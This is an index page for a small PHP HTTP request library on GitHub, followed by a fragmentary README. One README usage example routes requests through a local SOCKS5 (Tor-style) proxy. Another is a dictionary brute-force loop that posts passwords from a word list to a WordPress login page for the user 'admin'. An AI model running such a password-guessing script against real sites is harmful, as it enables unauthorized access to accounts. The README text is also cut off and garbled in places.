Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/dmouse/walker
https://github.com/dmouse/walker
Last synced: 18 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/dmouse/walker
- Owner: dmouse
- Created: 2011-11-16T05:17:36.000Z (about 13 years ago)
- Default Branch: master
- Last Pushed: 2011-12-28T04:01:51.000Z (about 13 years ago)
- Last Synced: 2024-11-11T06:30:25.394Z (about 2 months ago)
- Language: PHP
- Homepage:
- Size: 93.8 KB
- Stars: 1
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README
Awesome Lists containing this project
README
true, // false
"debug" => 1, // 0,1
"method" => "POST", // default GET
"data" => array("start"=>"0","limit"=>"8000"), //data POST
"proxy" => "127.0.0.1:9050", // proxy SOCKS5
);
$url = "http://www.google.com/";
$html = $w -> run ( $url, $op);
print $html;
?>false,
"debug" => 1,
"method" => "POST",
"data" => array(
"usr"=>"admin",
"pwd"=>"xd",
),
);$url = "http://localhost/wordpress/wp-login.php";
$dic = fopen("dic.txt","r");
$w -> multi_init();
while ( $pass = fgets($dic) ){
$op['data']['pwd'] = trim($pass);
$w -> multi_opts ($url, $op);
}
$res = $w -> multi_run();foreach ($res as $key => $html){
print_r ($html);
}